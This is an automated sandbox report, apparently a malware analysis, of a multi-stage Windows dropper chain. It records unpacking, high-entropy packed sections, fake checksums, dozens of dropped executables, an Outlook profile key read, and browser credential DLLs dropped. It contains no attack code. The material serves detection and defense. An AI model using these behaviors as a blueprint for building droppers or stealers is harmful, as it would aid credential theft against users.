Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Section loaded: profapi.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Directory created: C:\Program Files\Google\Chrome\Extensions
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Directory created: C:\Program Files\Windows Media Player\graph
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Directory created: C:\Program Files\Windows Media Player\graph\graph.exe
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip

Source: file.exe

Static file information: File size 3263488 > 1048576

Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: file.exe

Static PE information: Raw size of dblbhqnk is bigger than: 0x100000 < 0x2b0e00

Source:	Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: cc6f25572f.exe, 00000010.00000003.2843921886.000002B0C3894000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000012.00000000.2844105614.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000014.00000000.2876091171.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000015.00000000.2968882677.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000017.00000000.3051120519.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: cc6f25572f.exe, 00000010.00000002.2888013323.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000010.00000000.2731872890.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000002.2972181574.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: cc6f25572f.exe, 00000010.00000002.2888013323.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000010.00000000.2731872890.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000002.2972181574.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp, cc6f25572f.exe, 00000011.00000000.2740743202.00007FF735960000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: C:\Admin\Workspace\1766103906\Project\Release\Project.pdb source: af155ed129.exe, 00000006.00000000.2441026103.000000000032C000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: cc6f25572f.exe, 00000010.00000003.2843921886.000002B0C3894000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 00000012.00000000.2844105614.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000014.00000000.2876091171.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000015.00000000.2968882677.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp, graph.exe, 00000017.00000000.3051120519.00007FF70EFA9000.00000002.00000001.01000000.00000010.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.850000.0.unpack :EW;.rsrc:W;.idata :W;dblbhqnk:EW;rrjzixml:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;dblbhqnk:EW;rrjzixml:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 1.2.skotes.exe.9a0000.0.unpack :EW;.rsrc:W;.idata :W;dblbhqnk:EW;rrjzixml:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;dblbhqnk:EW;rrjzixml:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Unpacked PE file: 12.2.5cda6c90d7.exe.f70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wekcazbo:EW;ttllozcv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wekcazbo:EW;ttllozcv:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Unpacked PE file: 22.2.b05c9e01f3.exe.8a0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wasfhoet:EW;ygjteyur:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wasfhoet:EW;ygjteyur:EW;.taggant:EW;

Source: Y-Cleaner.exe.31.dr

Static PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[1].exe1.5.dr	Static PE information: real checksum: 0x1d4149 should be: 0x1d15dc
Source: Bunifu_UI_v1.5.3.dll.31.dr	Static PE information: real checksum: 0x0 should be: 0x400e1
Source: random[2].exe0.5.dr	Static PE information: real checksum: 0x44582f should be: 0x447676
Source: cd2469328d.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0xc8597
Source: b6638733e4.exe.5.dr	Static PE information: real checksum: 0x44582f should be: 0x447676
Source: 7z.exe.24.dr	Static PE information: real checksum: 0x0 should be: 0x7b29e
Source: graph.exe.16.dr	Static PE information: real checksum: 0x0 should be: 0x46f82
Source: random[4].exe.5.dr	Static PE information: real checksum: 0x1c78f1 should be: 0x1c6c54
Source: random[3].exe2.5.dr	Static PE information: real checksum: 0x2b47d9 should be: 0x2b698f
Source: c9d0f96e57.exe.5.dr	Static PE information: real checksum: 0x1e0ac5 should be: 0x1dfe7b
Source: soft[1].31.dr	Static PE information: real checksum: 0x0 should be: 0x170243
Source: random[2].exe1.5.dr	Static PE information: real checksum: 0x444939 should be: 0x441c4a
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x31f491 should be: 0x322e86
Source: Y-Cleaner.exe.31.dr	Static PE information: real checksum: 0x0 should be: 0x170243
Source: random[2].exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: cc6b47fc15.exe.5.dr	Static PE information: real checksum: 0x1d4149 should be: 0x1d15dc
Source: cc6f25572f.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x9f7ff
Source: dll[1].31.dr	Static PE information: real checksum: 0x0 should be: 0x400e1
Source: Gxtuum.exe.13.dr	Static PE information: real checksum: 0x0 should be: 0x7aa07
Source: b05c9e01f3.exe.5.dr	Static PE information: real checksum: 0x444939 should be: 0x441c4a
Source: random[3].exe1.5.dr	Static PE information: real checksum: 0x2e060a should be: 0x2d75b0
Source: 35f0a75b93.exe.5.dr	Static PE information: real checksum: 0x2e060a should be: 0x2d75b0
Source: 7z.dll.24.dr	Static PE information: real checksum: 0x0 should be: 0x1a2c6b
Source: random[1].exe2.5.dr	Static PE information: real checksum: 0x0 should be: 0x7aa07
Source: 54682ac64c.exe.5.dr	Static PE information: real checksum: 0x2b47d9 should be: 0x2b698f
Source: 5cda6c90d7.exe.5.dr	Static PE information: real checksum: 0x1d4149 should be: 0x1d15dc
Source: 7739517025.exe.5.dr	Static PE information: real checksum: 0x0 should be: 0x7aa07
Source: file.exe	Static PE information: real checksum: 0x31f491 should be: 0x322e86
Source: 142c991362.exe.5.dr	Static PE information: real checksum: 0x1c78f1 should be: 0x1c6c54
Source: random[2].exe2.5.dr	Static PE information: real checksum: 0x1e0ac5 should be: 0x1dfe7b
Source: random[1].exe0.5.dr	Static PE information: real checksum: 0x0 should be: 0xc8597

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: dblbhqnk
Source: file.exe	Static PE information: section name: rrjzixml
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name: dblbhqnk
Source: skotes.exe.0.dr	Static PE information: section name: rrjzixml
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.5.dr	Static PE information: section name: .fptable
Source: af155ed129.exe.5.dr	Static PE information: section name: .fptable
Source: random[1].exe1.5.dr	Static PE information: section name:
Source: random[1].exe1.5.dr	Static PE information: section name: .idata
Source: random[1].exe1.5.dr	Static PE information: section name:
Source: random[1].exe1.5.dr	Static PE information: section name: wekcazbo
Source: random[1].exe1.5.dr	Static PE information: section name: ttllozcv
Source: random[1].exe1.5.dr	Static PE information: section name: .taggant
Source: 5cda6c90d7.exe.5.dr	Static PE information: section name:
Source: 5cda6c90d7.exe.5.dr	Static PE information: section name: .idata
Source: 5cda6c90d7.exe.5.dr	Static PE information: section name:
Source: 5cda6c90d7.exe.5.dr	Static PE information: section name: wekcazbo
Source: 5cda6c90d7.exe.5.dr	Static PE information: section name: ttllozcv
Source: 5cda6c90d7.exe.5.dr	Static PE information: section name: .taggant
Source: cc6b47fc15.exe.5.dr	Static PE information: section name:
Source: cc6b47fc15.exe.5.dr	Static PE information: section name: .idata
Source: cc6b47fc15.exe.5.dr	Static PE information: section name:
Source: cc6b47fc15.exe.5.dr	Static PE information: section name: wekcazbo
Source: cc6b47fc15.exe.5.dr	Static PE information: section name: ttllozcv
Source: cc6b47fc15.exe.5.dr	Static PE information: section name: .taggant
Source: random[2].exe0.5.dr	Static PE information: section name:
Source: random[2].exe0.5.dr	Static PE information: section name: .idata
Source: random[2].exe0.5.dr	Static PE information: section name:
Source: random[2].exe0.5.dr	Static PE information: section name: dsmoqcnp
Source: random[2].exe0.5.dr	Static PE information: section name: yktdnnda
Source: random[2].exe0.5.dr	Static PE information: section name: .taggant
Source: b6638733e4.exe.5.dr	Static PE information: section name:
Source: b6638733e4.exe.5.dr	Static PE information: section name: .idata
Source: b6638733e4.exe.5.dr	Static PE information: section name:
Source: b6638733e4.exe.5.dr	Static PE information: section name: dsmoqcnp
Source: b6638733e4.exe.5.dr	Static PE information: section name: yktdnnda
Source: b6638733e4.exe.5.dr	Static PE information: section name: .taggant
Source: random[2].exe1.5.dr	Static PE information: section name:
Source: random[2].exe1.5.dr	Static PE information: section name: .idata
Source: random[2].exe1.5.dr	Static PE information: section name:
Source: random[2].exe1.5.dr	Static PE information: section name: wasfhoet
Source: random[2].exe1.5.dr	Static PE information: section name: ygjteyur
Source: random[2].exe1.5.dr	Static PE information: section name: .taggant
Source: b05c9e01f3.exe.5.dr	Static PE information: section name:
Source: b05c9e01f3.exe.5.dr	Static PE information: section name: .idata
Source: b05c9e01f3.exe.5.dr	Static PE information: section name:
Source: b05c9e01f3.exe.5.dr	Static PE information: section name: wasfhoet
Source: b05c9e01f3.exe.5.dr	Static PE information: section name: ygjteyur
Source: b05c9e01f3.exe.5.dr	Static PE information: section name: .taggant
Source: random[2].exe2.5.dr	Static PE information: section name:
Source: random[2].exe2.5.dr	Static PE information: section name: .idata
Source: random[2].exe2.5.dr	Static PE information: section name:
Source: random[2].exe2.5.dr	Static PE information: section name: tsdsdsrb
Source: random[2].exe2.5.dr	Static PE information: section name: qtylzonp
Source: random[2].exe2.5.dr	Static PE information: section name: .taggant
Source: c9d0f96e57.exe.5.dr	Static PE information: section name:
Source: c9d0f96e57.exe.5.dr	Static PE information: section name: .idata
Source: c9d0f96e57.exe.5.dr	Static PE information: section name:
Source: c9d0f96e57.exe.5.dr	Static PE information: section name: tsdsdsrb
Source: c9d0f96e57.exe.5.dr	Static PE information: section name: qtylzonp
Source: c9d0f96e57.exe.5.dr	Static PE information: section name: .taggant
Source: random[4].exe.5.dr	Static PE information: section name:
Source: random[4].exe.5.dr	Static PE information: section name: .idata
Source: random[4].exe.5.dr	Static PE information: section name:
Source: random[4].exe.5.dr	Static PE information: section name: ltyimmoj
Source: random[4].exe.5.dr	Static PE information: section name: vmbhrkov
Source: random[4].exe.5.dr	Static PE information: section name: .taggant
Source: 142c991362.exe.5.dr	Static PE information: section name:
Source: 142c991362.exe.5.dr	Static PE information: section name: .idata
Source: 142c991362.exe.5.dr	Static PE information: section name:
Source: 142c991362.exe.5.dr	Static PE information: section name: ltyimmoj
Source: 142c991362.exe.5.dr	Static PE information: section name: vmbhrkov
Source: 142c991362.exe.5.dr	Static PE information: section name: .taggant
Source: random[3].exe1.5.dr	Static PE information: section name:
Source: random[3].exe1.5.dr	Static PE information: section name: .idata
Source: random[3].exe1.5.dr	Static PE information: section name: syphqzjl
Source: random[3].exe1.5.dr	Static PE information: section name: tdmszgwn
Source: random[3].exe1.5.dr	Static PE information: section name: .taggant
Source: 35f0a75b93.exe.5.dr	Static PE information: section name:
Source: 35f0a75b93.exe.5.dr	Static PE information: section name: .idata
Source: 35f0a75b93.exe.5.dr	Static PE information: section name: syphqzjl
Source: 35f0a75b93.exe.5.dr	Static PE information: section name: tdmszgwn
Source: 35f0a75b93.exe.5.dr	Static PE information: section name: .taggant
Source: random[3].exe2.5.dr	Static PE information: section name:
Source: random[3].exe2.5.dr	Static PE information: section name: .idata
Source: random[3].exe2.5.dr	Static PE information: section name: osxguznn
Source: random[3].exe2.5.dr	Static PE information: section name: nksckbfu
Source: random[3].exe2.5.dr	Static PE information: section name: .taggant
Source: 54682ac64c.exe.5.dr	Static PE information: section name:
Source: 54682ac64c.exe.5.dr	Static PE information: section name: .idata
Source: 54682ac64c.exe.5.dr	Static PE information: section name: osxguznn
Source: 54682ac64c.exe.5.dr	Static PE information: section name: nksckbfu
Source: 54682ac64c.exe.5.dr	Static PE information: section name: .taggant
Source: service123.exe.19.dr	Static PE information: section name: .eh_fram
Source: CaHNbeclRGcBxNSvHjFX.dll.19.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0086D91C push ecx; ret	0_2_0086D92F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00861359 push es; ret	0_2_0086135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_009BD91C push ecx; ret	1_2_009BD92F
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 8_2_0033534A push ecx; ret	8_2_0033535D
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 10_2_0033534A push ecx; ret	10_2_0033535D
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 11_3_00D96D48 pushad ; retf	11_3_00D96D49
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 11_3_00DA11F3 pushad ; iretd	11_3_00DA12B1
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 11_3_00DA1522 pushfd ; iretd	11_3_00DA1551
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 11_3_00D8C90C pushad ; iretd	11_3_00D8CE19
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 11_3_00D8CEE9 push ebp; retf	11_3_00D8CFE7
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 11_3_00D96D48 pushad ; retf	11_3_00D96D49
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 11_3_00DA11F3 pushad ; iretd	11_3_00DA12B1
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 11_3_00DA1522 pushfd ; iretd	11_3_00DA1551
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 11_3_00DA11F3 pushad ; iretd	11_3_00DA12B1
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 11_3_00DA1522 pushfd ; iretd	11_3_00DA1551
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 11_3_00D96D48 pushad ; retf	11_3_00D96D49
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 11_3_00DA11F3 pushad ; iretd	11_3_00DA12B1
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 11_3_00DA1522 pushfd ; iretd	11_3_00DA1551

Source: file.exe	Static PE information: section name: entropy: 7.022156452672956
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.022156452672956
Source: random[1].exe1.5.dr	Static PE information: section name: entropy: 7.980952558000639
Source: random[1].exe1.5.dr	Static PE information: section name: wekcazbo entropy: 7.952954751128578
Source: 5cda6c90d7.exe.5.dr	Static PE information: section name: entropy: 7.980952558000639
Source: 5cda6c90d7.exe.5.dr	Static PE information: section name: wekcazbo entropy: 7.952954751128578
Source: cc6b47fc15.exe.5.dr	Static PE information: section name: entropy: 7.980952558000639
Source: cc6b47fc15.exe.5.dr	Static PE information: section name: wekcazbo entropy: 7.952954751128578
Source: random[2].exe0.5.dr	Static PE information: section name: dsmoqcnp entropy: 7.955290208617223
Source: b6638733e4.exe.5.dr	Static PE information: section name: dsmoqcnp entropy: 7.955290208617223
Source: random[2].exe1.5.dr	Static PE information: section name: wasfhoet entropy: 7.954660871223602
Source: b05c9e01f3.exe.5.dr	Static PE information: section name: wasfhoet entropy: 7.954660871223602
Source: random[2].exe2.5.dr	Static PE information: section name: tsdsdsrb entropy: 7.947776160551148
Source: c9d0f96e57.exe.5.dr	Static PE information: section name: tsdsdsrb entropy: 7.947776160551148
Source: random[4].exe.5.dr	Static PE information: section name: entropy: 7.972390819276659
Source: random[4].exe.5.dr	Static PE information: section name: ltyimmoj entropy: 7.953284691458963
Source: 142c991362.exe.5.dr	Static PE information: section name: entropy: 7.972390819276659
Source: 142c991362.exe.5.dr	Static PE information: section name: ltyimmoj entropy: 7.953284691458963
Source: Y-Cleaner.exe.31.dr	Static PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].31.dr	Static PE information: section name: .text entropy: 7.918511524700298

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json

Drops PE files to the document folder of the user

Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe

File created: C:\Users\user\Documents\DBAEGCGCGI.exe

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File created: C:\Users\user\AppData\Local\Temp\MSMQUTWP7M2KT78991EY50.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	File created: C:\Users\user\AppData\Local\Temp\YVDVBfFGR3eAeBewwD9vewWwVe0B\Y-Cleaner.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[4].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe	File created: C:\Program Files\Windows Media Player\graph\graph.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	File created: C:\Users\user\AppData\Local\Temp\main\7z.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	File created: C:\Users\user\AppData\Local\Temp\YVDVBfFGR3eAeBewwD9vewWwVe0B\Bunifu_UI_v1.5.3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	File created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1019813001\cc6b47fc15.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1019812001\54682ac64c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	File created: C:\Users\user\AppData\Local\Temp\CaHNbeclRGcBxNSvHjFX.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\Users\user\Documents\DBAEGCGCGI.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File created: C:\Users\user\AppData\Local\Temp\W5BO33UUYQPDZ9CE875CW1XCH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Jump to dropped file
